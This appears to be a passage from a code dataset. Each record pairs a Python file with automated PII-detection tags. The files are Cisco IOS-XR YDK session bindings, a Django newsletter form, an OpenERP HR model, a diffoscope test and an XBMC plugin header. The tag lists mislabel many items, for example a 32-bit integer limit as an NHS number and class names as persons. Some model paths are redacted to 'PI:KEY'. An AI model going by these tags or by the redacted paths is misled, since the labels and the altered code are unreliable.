return meta._meta_table['Netconf']['meta_info']
class XrXml(object):
""""""
xr xml
.. attribute:: agent
XML agents
**type**\: :py:class:`Agent `
""""""
_prefix = 'man-xml-ttyagent-oper'
_revision = '2015-07-30'
def __init__(self):
self.agent = XrXml.Agent()
self.agent.parent = self
class Agent(object):
""""""
XML agents
.. attribute:: default
Default sessions information
**type**\: :py:class:`Default `
.. attribute:: ssl
SSL sessions information
**type**\: :py:class:`Ssl `
.. attribute:: tty
TTY sessions information
**type**\: :py:class:`Tty `
""""""
_prefix = 'man-xml-ttyagent-oper'
_revision = '2015-07-30'
def __init__(self):
self.parent = None
self.default = XrXml.Agent.Default()
self.default.parent = self
self.ssl = XrXml.Agent.Ssl()
self.ssl.parent = self
self.tty = XrXml.Agent.Tty()
self.tty.parent = self
class Tty(object):
""""""
TTY sessions information
.. attribute:: sessions
sessions information
**type**\: :py:class:`Sessions `
""""""
_prefix = 'man-xml-ttyagent-oper'
_revision = '2015-07-30'
def __init__(self):
self.parent = None
self.sessions = XrXml.Agent.Tty.Sessions()
self.sessions.parent = self
class Sessions(object):
""""""
sessions information
.. attribute:: session
xml sessions information
**type**\: list of :py:class:`Session `
""""""
_prefix = 'man-xml-ttyagent-oper'
_revision = '2015-07-30'
def __init__(self):
self.parent = None
self.session = YList()
self.session.parent = self
self.session.name = 'session'
class Session(object):
""""""
xml sessions information
.. attribute:: session_id
Session Id
**type**\: int
**range:** \-2147483648..2147483647
.. attribute:: admin_config_session_id
Admin config session ID
**type**\: str
.. attribute:: alarm_notification
is the session registered for alarm notifications
**type**\: :py:class:`XrXmlSessionAlarmRegisterEnum `
.. attribute:: client_address
ip address of the client
**type**\: str
.. attribute:: client_port
client's port
**type**\: int
**range:** 0..4294967295
.. attribute:: config_session_id
Config session ID
**type**\: str
.. attribute:: elapsed_time
Elapsed time(seconds) since a session is created
**type**\: int
**range:** 0..4294967295
**units**\: second
.. attribute:: last_state_change
Time(seconds) since last session state change happened
**type**\: int
**range:** 0..4294967295
**units**\: second
.. attribute:: start_time
session start time in seconds since the Unix Epoch
**type**\: int
**range:** 0..4294967295
**units**\: second
.. attribute:: state
state of the session idle/busy
**type**\: :py:class:`XrXmlSessionStateEnum `
.. attribute:: username
Username
**type**\: str
.. attribute:: vrf_name
VRF name
**type**\: str
""""""
_prefix = 'man-xml-ttyagent-oper'
_revision = '2015-07-30'
def __init__(self):
self.parent = None
self.session_id = None
self.admin_config_session_id = None
self.alarm_notification = None
self.client_address = None
self.client_port = None
self.config_session_id = None
self.elapsed_time = None
self.last_state_change = None
self.start_time = None
self.state = None
self.username = None
self.vrf_name = None
@property
def _common_path(self):
if self.session_id is None:
raise YPYModelError('Key property session_id is None')
return 'PI:KEY:session[Cisco-IOS-XR-man-xml-ttyagent-oper:session-id = ' + str(self.session_id) + ']'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.session_id is not None:
return True
if self.admin_config_session_id is not None:
return True
if self.alarm_notification is not None:
return True
if self.client_address is not None:
return True
if self.client_port is not None:
return True
if self.config_session_id is not None:
return True
if self.elapsed_time is not None:
return True
if self.last_state_change is not None:
return True
if self.start_time is not None:
return True
if self.state is not None:
return True
if self.username is not None:
return True
if self.vrf_name is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta
return meta._meta_table['XrXml.Agent.Tty.Sessions.Session']['meta_info']
@property
def _common_path(self):
return 'PI:KEY'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.session is not None:
for child_ref in self.session:
if child_ref._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta
return meta._meta_table['XrXml.Agent.Tty.Sessions']['meta_info']
@property
def _common_path(self):
return 'PI:KEY'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.sessions is not None and self.sessions._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta
return meta._meta_table['XrXml.Agent.Tty']['meta_info']
class Default(object):
""""""
Default sessions information
.. attribute:: sessions
sessions information
**type**\: :py:class:`Sessions `
""""""
_prefix = 'man-xml-ttyagent-oper'
_revision = '2015-07-30'
def __init__(self):
self.parent = None
self.sessions = XrXml.Agent.Default.Sessions()
self.sessions.parent = self
class Sessions(object):
""""""
sessions information
.. attribute:: session
xml sessions information
**type**\: list of :py:class:`Session `
""""""
_prefix = 'man-xml-ttyagent-oper'
_revision = '2015-07-30'
def __init__(self):
self.parent = None
self.session = YList()
self.session.parent = self
self.session.name = 'session'
class Session(object):
""""""
xml sessions information
.. attribute:: session_id
Session Id
**type**\: int
**range:** \-2147483648..2147483647
.. attribute:: admin_config_session_id
Admin config session ID
**type**\: str
.. attribute:: alarm_notification
is the session registered for alarm notifications
**type**\: :py:class:`XrXmlSessionAlarmRegisterEnum `
.. attribute:: client_address
ip address of the client
**type**\: str
.. attribute:: client_port
client's port
**type**\: int
**range:** 0..4294967295
.. attribute:: config_session_id
Config session ID
**type**\: str
.. attribute:: elapsed_time
Elapsed time(seconds) since a session is created
**type**\: int
**range:** 0..4294967295
**units**\: second
.. attribute:: last_state_change
Time(seconds) since last session state change happened
**type**\: int
**range:** 0..4294967295
**units**\: second
.. attribute:: start_time
session start time in seconds since the Unix Epoch
**type**\: int
**range:** 0..4294967295
**units**\: second
.. attribute:: state
state of the session idle/busy
**type**\: :py:class:`XrXmlSessionStateEnum `
.. attribute:: username
Username
**type**\: str
.. attribute:: vrf_name
VRF name
**type**\: str
""""""
_prefix = 'man-xml-ttyagent-oper'
_revision = '2015-07-30'
def __init__(self):
self.parent = None
self.session_id = None
self.admin_config_session_id = None
self.alarm_notification = None
self.client_address = None
self.client_port = None
self.config_session_id = None
self.elapsed_time = None
self.last_state_change = None
self.start_time = None
self.state = None
self.username = None
self.vrf_name = None
@property
def _common_path(self):
if self.session_id is None:
raise YPYModelError('Key property session_id is None')
return 'PI:KEY:session[Cisco-IOS-XR-man-xml-ttyagent-oper:session-id = ' + str(self.session_id) + ']'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.session_id is not None:
return True
if self.admin_config_session_id is not None:
return True
if self.alarm_notification is not None:
return True
if self.client_address is not None:
return True
if self.client_port is not None:
return True
if self.config_session_id is not None:
return True
if self.elapsed_time is not None:
return True
if self.last_state_change is not None:
return True
if self.start_time is not None:
return True
if self.state is not None:
return True
if self.username is not None:
return True
if self.vrf_name is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta
return meta._meta_table['XrXml.Agent.Default.Sessions.Session']['meta_info']
@property
def _common_path(self):
return 'PI:KEY'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.session is not None:
for child_ref in self.session:
if child_ref._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta
return meta._meta_table['XrXml.Agent.Default.Sessions']['meta_info']
@property
def _common_path(self):
return 'PI:KEY'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.sessions is not None and self.sessions._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta
return meta._meta_table['XrXml.Agent.Default']['meta_info']
class Ssl(object):
""""""
SSL sessions information
.. attribute:: sessions
sessions information
**type**\: :py:class:`Sessions `
""""""
_prefix = 'man-xml-ttyagent-oper'
_revision = '2015-07-30'
def __init__(self):
self.parent = None
self.sessions = XrXml.Agent.Ssl.Sessions()
self.sessions.parent = self
class Sessions(object):
""""""
sessions information
.. attribute:: session
xml sessions information
**type**\: list of :py:class:`Session `
""""""
_prefix = 'man-xml-ttyagent-oper'
_revision = '2015-07-30'
def __init__(self):
self.parent = None
self.session = YList()
self.session.parent = self
self.session.name = 'session'
class Session(object):
""""""
xml sessions information
.. attribute:: session_id
Session Id
**type**\: int
**range:** \-2147483648..2147483647
.. attribute:: admin_config_session_id
Admin config session ID
**type**\: str
.. attribute:: alarm_notification
is the session registered for alarm notifications
**type**\: :py:class:`XrXmlSessionAlarmRegisterEnum `
.. attribute:: client_address
ip address of the client
**type**\: str
.. attribute:: client_port
client's port
**type**\: int
**range:** 0..4294967295
.. attribute:: config_session_id
Config session ID
**type**\: str
.. attribute:: elapsed_time
Elapsed time(seconds) since a session is created
**type**\: int
**range:** 0..4294967295
**units**\: second
.. attribute:: last_state_change
Time(seconds) since last session state change happened
**type**\: int
**range:** 0..4294967295
**units**\: second
.. attribute:: start_time
session start time in seconds since the Unix Epoch
**type**\: int
**range:** 0..4294967295
**units**\: second
.. attribute:: state
state of the session idle/busy
**type**\: :py:class:`XrXmlSessionStateEnum `
.. attribute:: username
Username
**type**\: str
.. attribute:: vrf_name
VRF name
**type**\: str
""""""
_prefix = 'man-xml-ttyagent-oper'
_revision = '2015-07-30'
def __init__(self):
self.parent = None
self.session_id = None
self.admin_config_session_id = None
self.alarm_notification = None
self.client_address = None
self.client_port = None
self.config_session_id = None
self.elapsed_time = None
self.last_state_change = None
self.start_time = None
self.state = None
self.username = None
self.vrf_name = None
@property
def _common_path(self):
if self.session_id is None:
raise YPYModelError('Key property session_id is None')
return 'PI:KEY:session[Cisco-IOS-XR-man-xml-ttyagent-oper:session-id = ' + str(self.session_id) + ']'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.session_id is not None:
return True
if self.admin_config_session_id is not None:
return True
if self.alarm_notification is not None:
return True
if self.client_address is not None:
return True
if self.client_port is not None:
return True
if self.config_session_id is not None:
return True
if self.elapsed_time is not None:
return True
if self.last_state_change is not None:
return True
if self.start_time is not None:
return True
if self.state is not None:
return True
if self.username is not None:
return True
if self.vrf_name is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta
return meta._meta_table['XrXml.Agent.Ssl.Sessions.Session']['meta_info']
@property
def _common_path(self):
return 'PI:KEY'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.session is not None:
for child_ref in self.session:
if child_ref._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta
return meta._meta_table['XrXml.Agent.Ssl.Sessions']['meta_info']
@property
def _common_path(self):
return 'PI:KEY'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.sessions is not None and self.sessions._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta
return meta._meta_table['XrXml.Agent.Ssl']['meta_info']
@property
def _common_path(self):
return 'PI:KEY'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.default is not None and self.default._has_data():
return True
if self.ssl is not None and self.ssl._has_data():
return True
if self.tty is not None and self.tty._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta
return meta._meta_table['XrXml.Agent']['meta_info']
@property
def _common_path(self):
return '/Cisco-IOS-XR-man-xml-ttyagent-oper:xr-xml'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.agent is not None and self.agent._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta
return meta._meta_table['XrXml']['meta_info']
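# A minimal traversal sketch (editor's illustration, not part of the generated
# bindings; the session values are invented). It shows how _has_data() bubbles
# up from a populated Session entry through Sessions -> Tty -> Agent -> Netconf,
# mirroring the _has_data() chains defined above.
def _example_netconf_has_data():
    netconf = Netconf()
    session = Netconf.Agent.Tty.Sessions.Session()
    session.session_id = 42                    # key property, must be set
    session.username = 'admin'
    session.state = XrXmlSessionStateEnum.idle
    netconf.agent.tty.sessions.session.append(session)
    assert netconf._has_data()      # True: one populated session entry
    assert not netconf.is_config()  # operational model, never config data
    return netconf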
",41298,"[['UK_NHS', '2147483648'], ['UK_NHS', '2147483648'], ['UK_NHS', '2147483648'], ['UK_NHS', '2147483648'], ['PERSON', 'Enum'], ['DATE_TIME', ""2015-07-30'""], ['DATE_TIME', ""2015-07-30'""], ['DATE_TIME', ""2015-07-30'""], ['DATE_TIME', ""2015-07-30'""], ['PERSON', 'class:`XrXmlSessionAlarmRegisterEnum'], ['DATE_TIME', 'seconds'], ['PERSON', 'class:`XrXmlSessionStateEnum'], ['DATE_TIME', ""2015-07-30'""], ['PERSON', ""Agent']['meta_info""], ['DATE_TIME', ""2015-07-30'""], ['DATE_TIME', ""2015-07-30'""], ['DATE_TIME', ""2015-07-30'""], ['DATE_TIME', ""2015-07-30'""], ['PERSON', 'class:`XrXmlSessionAlarmRegisterEnum'], ['DATE_TIME', 'seconds'], ['PERSON', 'class:`XrXmlSessionStateEnum'], ['DATE_TIME', ""2015-07-30'""], ['DATE_TIME', ""2015-07-30'""], ['DATE_TIME', ""2015-07-30'""], ['PERSON', 'class:`XrXmlSessionAlarmRegisterEnum'], ['DATE_TIME', 'seconds'], ['PERSON', 'class:`XrXmlSessionStateEnum'], ['DATE_TIME', ""2015-07-30'""], ['DATE_TIME', ""2015-07-30'""], ['DATE_TIME', ""2015-07-30'""], ['PERSON', 'class:`XrXmlSessionAlarmRegisterEnum'], ['DATE_TIME', 'seconds'], ['PERSON', 'class:`XrXmlSessionStateEnum'], ['DATE_TIME', ""2015-07-30'""], ['PERSON', ""Agent']['meta_info""], ['IP_ADDRESS', ' '], ['IP_ADDRESS', 'e:: '], ['URL', 'ydk.er'], ['URL', 'ydk.models.ci'], ['URL', 'ydk.models.ci'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'oper.Netconf.Ag'], ['URL', 'self.ag'], ['URL', 'Netconf.Ag'], ['URL', 'self.agent.pa'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'oper.Netconf.Agent.Tt'], ['URL', 'self.pa'], ['URL', 'self.tt'], ['URL', 'Netconf.Agent.Tt'], ['URL', 'self.tty.pa'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'oper.Netconf.Agent.Tty.Se'], ['URL', 'self.pa'], ['URL', 'self.se'], ['URL', 'Netconf.Agent.Tty.Se'], ['URL', 'self.sessions.pa'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'oper.Netconf.Agent.Tty.Sessions.Se'], ['URL', 'self.pa'], ['URL', 'self.se'], ['URL', 'self.session.pa'], ['URL', 'self.session.na'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'self.pa'], ['URL', 'self.se'], ['URL', 'self.ad'], ['URL', 'self.al'], ['URL', 'self.cl'], ['URL', 'self.cl'], ['URL', 'self.co'], ['URL', 'self.la'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'self.us'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'self.ad'], ['URL', 'self.al'], ['URL', 'self.cl'], ['URL', 'self.cl'], ['URL', 'self.co'], ['URL', 'self.la'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'self.us'], ['URL', 'ydk.models.ci'], ['URL', 'Netconf.Agent.Tty.Sessions.Se'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'ydk.models.ci'], ['URL', 'Netconf.Agent.Tty.Se'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'ydk.models.ci'], ['URL', 'Netconf.Agent.Tt'], ['URL', 'self.tt'], ['URL', 'self.tt'], ['URL', 'ydk.models.ci'], ['URL', 'Netconf.Ag'], ['URL', 'self.ag'], ['URL', 'self.ag'], ['URL', 'ydk.models.ci'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'oper.XrXml.Ag'], ['URL', 'self.ag'], ['URL', 'XrXml.Ag'], ['URL', 'self.agent.pa'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'oper.XrXml.Agent.De'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'oper.XrXml.Ag'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'oper.XrXml.Agent.Tt'], ['URL', 'self.pa'], ['URL', 'self.de'], ['URL', 'XrXml.Agent.De'], ['URL', 'self.default.pa'], ['URL', 'XrXml.Ag'], ['URL', 'self.ssl.pa'], ['URL', 'self.tt'], ['URL', 'XrXml.Agent.Tt'], ['URL', 'self.tty.pa'], ['URL', 
'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'oper.XrXml.Agent.Tty.Se'], ['URL', 'self.pa'], ['URL', 'self.se'], ['URL', 'XrXml.Agent.Tty.Se'], ['URL', 'self.sessions.pa'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'oper.XrXml.Agent.Tty.Sessions.Se'], ['URL', 'self.pa'], ['URL', 'self.se'], ['URL', 'self.session.pa'], ['URL', 'self.session.na'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'self.pa'], ['URL', 'self.se'], ['URL', 'self.ad'], ['URL', 'self.al'], ['URL', 'self.cl'], ['URL', 'self.cl'], ['URL', 'self.co'], ['URL', 'self.la'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'self.us'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'self.ad'], ['URL', 'self.al'], ['URL', 'self.cl'], ['URL', 'self.cl'], ['URL', 'self.co'], ['URL', 'self.la'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'self.us'], ['URL', 'ydk.models.ci'], ['URL', 'XrXml.Agent.Tty.Sessions.Se'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'ydk.models.ci'], ['URL', 'XrXml.Agent.Tty.Se'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'ydk.models.ci'], ['URL', 'XrXml.Agent.Tt'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'oper.XrXml.Agent.Default.Se'], ['URL', 'self.pa'], ['URL', 'self.se'], ['URL', 'XrXml.Agent.Default.Se'], ['URL', 'self.sessions.pa'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'oper.XrXml.Agent.Default.Sessions.Se'], ['URL', 'self.pa'], ['URL', 'self.se'], ['URL', 'self.session.pa'], ['URL', 'self.session.na'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'self.pa'], ['URL', 'self.se'], ['URL', 'self.ad'], ['URL', 'self.al'], ['URL', 'self.cl'], ['URL', 'self.cl'], ['URL', 'self.co'], ['URL', 'self.la'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'self.us'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'self.ad'], ['URL', 'self.al'], ['URL', 'self.cl'], ['URL', 'self.cl'], ['URL', 'self.co'], ['URL', 'self.la'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'self.us'], ['URL', 'ydk.models.ci'], ['URL', 'XrXml.Agent.Default.Sessions.Se'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'ydk.models.ci'], ['URL', 'XrXml.Agent.Default.Se'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'ydk.models.ci'], ['URL', 'XrXml.Agent.De'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'oper.XrXml.Agent.Ssl.Se'], ['URL', 'self.pa'], ['URL', 'self.se'], ['URL', 'XrXml.Agent.Ssl.Se'], ['URL', 'self.sessions.pa'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'oper.XrXml.Agent.Ssl.Sessions.Se'], ['URL', 'self.pa'], ['URL', 'self.se'], ['URL', 'self.session.pa'], ['URL', 'self.session.na'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'self.pa'], ['URL', 'self.se'], ['URL', 'self.ad'], ['URL', 'self.al'], ['URL', 'self.cl'], ['URL', 'self.cl'], ['URL', 'self.co'], ['URL', 'self.la'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'self.us'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'self.ad'], ['URL', 'self.al'], ['URL', 'self.cl'], ['URL', 'self.cl'], ['URL', 'self.co'], ['URL', 'self.la'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'self.us'], ['URL', 'ydk.models.ci'], ['URL', 'XrXml.Agent.Ssl.Sessions.Se'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'ydk.models.ci'], ['URL', 'XrXml.Agent.Ssl.Se'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'ydk.models.ci'], ['URL', 'XrXml.Ag'], ['URL', 'self.de'], ['URL', 'self.de'], 
['URL', 'self.tt'], ['URL', 'self.tt'], ['URL', 'ydk.models.ci'], ['URL', 'XrXml.Ag'], ['URL', 'self.ag'], ['URL', 'self.ag'], ['URL', 'ydk.models.ci']]"
104,"__author__ = 'Viktor Kerkez dummy@email.com'
__contact__ = 'dummy@email.com'
__date__ = '20 April 2010'
__copyright__ = 'Copyright (c) 2010 Viktor Kerkez'
import logging
from django import forms
from django.conf import settings
from google.appengine.api import mail
# perart imports
from perart import models
class PerArtForm(forms.ModelForm):
tinymce = True
class ProgramForm(PerArtForm):
class Meta:
model = models.Program
exclude = ['url']
class ProjectForm(PerArtForm):
class Meta:
model = models.Project
exclude = ['url']
class NewsForm(PerArtForm):
class Meta:
model = models.News
exclude = ['url']
class MenuForm(PerArtForm):
tinymce = False
class Meta:
model = models.Menu
exclude = ['url']
class GalleryForm(PerArtForm):
class Meta:
model = models.Gallery
exclude = ['url']
class NewsletterForm(forms.Form):
name = forms.CharField(required=True)
email = forms.EmailField(required=True)
def send_email(self):
try:
mail.send_mail(sender='dummy@email.com',  # 'sender=' keyword restored; the scrape dropped it
to=settings.PERART_EMAIL,
subject='"%(name)s" se prijavio za newsletter' % self.cleaned_data,  # i.e. '"%(name)s" signed up for the newsletter'
body='Ime: %(name)s\nEmail: %(email)s' % self.cleaned_data)  # 'Ime' = 'Name'
return True
except Exception:
logging.exception('sending message failed')
return False
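# A minimal usage sketch (editor's illustration): how a view might drive the
# form above. The helper name and the POST payload are hypothetical.
def _example_newsletter_signup(post_data):
    form = NewsletterForm(post_data)
    if form.is_valid():
        # cleaned_data now holds 'name' and 'email', which send_email() formats
        return form.send_email()
    return False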
",1485,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Viktor Kerkez'], ['DATE_TIME', ""'20 April 2010'""], ['DATE_TIME', '2010'], ['PERSON', 'Viktor Kerkez'], ['URL', 'forms.Fo'], ['PERSON', 'PERART_EMAIL'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'django.co'], ['URL', 'forms.Mo'], ['URL', 'models.Pro'], ['URL', 'models.Pro'], ['URL', 'models.Ne'], ['URL', 'models.Me'], ['URL', 'models.Ga'], ['URL', 'forms.Ch'], ['URL', 'mail.se'], ['URL', 'email.com'], ['URL', 'settings.PE'], ['URL', 'self.cl'], ['URL', 'self.cl']]"
105,"#!/usr/bin/python
# -*- coding: utf-8 -*-
##############################################################################
#
# Pedro Arroyo M dummy@email.com
# Copyright (C) 2015 Mall Connection (http://www.mallconnection.org).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from osv import osv
from osv import fields
class hr_family_responsibilities(osv.osv):
'''
Open ERP Model
'''
_name = 'hr.family.responsibilities'
_description = 'openerpmodel'
_columns = {
'name':fields.char('Name', size=64, required=True, readonly=False),
'type':fields.selection([
('simple','simple responsibility'),
('maternal','maternal responsibility'),
('invalid','invalid responsibility'),
], 'State', select=True),
'relationship':fields.selection([
('father','father'),
('son','son / daughter'),
('spouse','spouse'),
('Father in law','Father in law / mother in law'),
('son','son / daughter'),
('second','second'),
('Grandfather','Grandfather / Grandmother'),
('grandchild','grandchild / granddaughter'),
('sister','sister / brother'),
('brother in law','brother in law / sister in law'),
], 'Relationship', select=True, readonly=False),
'vat': fields.char('TIN', size=32, help="Tax Identification Number. Check the box if this contact is subjected to taxes. Used by some of the legal statements."),
'employee_id': fields.many2one('hr.employee', string='Employee'),
}
hr_family_responsibilities()",2456,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2015'], ['PERSON', ""law','Father""], ['PERSON', ""Grandfather','Grandfather""], ['URL', 'http://www.mallconnection.org'], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'email.com'], ['URL', 'hr.family.re'], ['URL', 'fields.ch'], ['URL', 'fields.se'], ['URL', 'fields.se'], ['URL', 'fields.ch'], ['URL', 'fields.ma']]"
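# A minimal usage sketch (editor's illustration): creating a record through the
# legacy OpenERP 6 osv API. The helper and all values are hypothetical; cr (the
# database cursor) and uid are supplied by the framework.
def _example_create_responsibility(pool, cr, uid):
    obj = pool.get('hr.family.responsibilities')
    return obj.create(cr, uid, {
        'name': 'Maria',
        'type': 'maternal',        # selection: simple / maternal / invalid
        'relationship': 'son',
        'employee_id': 1,          # many2one -> hr.employee record id
    })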
106,"# -*- coding: utf-8 -*-
#
# diffoscope: in-depth comparison of files, archives, and directories
#
# Copyright © 2018 Chris Lamb dummy@email.com
#
# diffoscope is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# diffoscope is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with diffoscope. If not, see <https://www.gnu.org/licenses/>.
import pytest
from diffoscope.comparators.gnumeric import GnumericFile
from ..utils.data import load_fixture, get_data
from ..utils.tools import skip_unless_tools_exist
from ..utils.nonexisting import assert_non_existing
gnumeric1 = load_fixture('test1.gnumeric')
gnumeric2 = load_fixture('test2.gnumeric')
def test_identification(gnumeric1):
assert isinstance(gnumeric1, GnumericFile)
def test_no_differences(gnumeric1):
difference = gnumeric1.compare(gnumeric1)
assert difference is None
@pytest.fixture
def differences(gnumeric1, gnumeric2):
return gnumeric1.compare(gnumeric2).details
@skip_unless_tools_exist('ssconvert')
def test_diff(differences):
expected_diff = get_data('gnumeric_expected_diff')
assert differences[0].unified_diff == expected_diff
@skip_unless_tools_exist('ssconvert')
def test_compare_non_existing(monkeypatch, gnumeric1):
assert_non_existing(monkeypatch, gnumeric1, has_null_source=False)
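# Editor's note: a sketch of running just these tests. The path follows
# diffoscope's usual tests/comparators/ layout (an assumption here), and
# ssconvert from Gnumeric must be installed or the diff test is skipped:
#
#   pytest -k gnumeric tests/comparators/test_gnumeric.py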
",1735,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Chris Lamb'], ['PERSON', ""@skip_unless_tools_exist('ssconvert""], ['PERSON', ""@skip_unless_tools_exist('ssconvert""], ['URL', 'https://www.gnu.org/licenses/'], ['URL', 'email.com'], ['URL', 'diffoscope.comparators.gn'], ['URL', '..utils.to'], ['URL', '..utils.no'], ['URL', 'test1.gn'], ['URL', 'test2.gn'], ['URL', 'gnumeric1.com'], ['URL', 'pytest.fi'], ['URL', 'gnumeric1.com']]"
107,"'''
xfilesharing XBMC Plugin
Copyright (C) 2013-2014 ddurdle
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import cloudservice
import os
import re
import urllib, urllib2
import cookielib
import xbmc, xbmcaddon, xbmcgui, xbmcplugin
# global variables
PLUGIN_NAME = 'plugin.video.cloudstream'
PLUGIN_URL = 'plugin://'+PLUGIN_NAME+'/'
ADDON = xbmcaddon.Addon(id=PLUGIN_NAME)
# helper methods
def log(msg, err=False):
if err:
xbmc.log(ADDON.getAddonInfo('name') + ': ' + msg, xbmc.LOGERROR)
else:
xbmc.log(ADDON.getAddonInfo('name') + ': ' + msg, xbmc.LOGDEBUG)
#
#
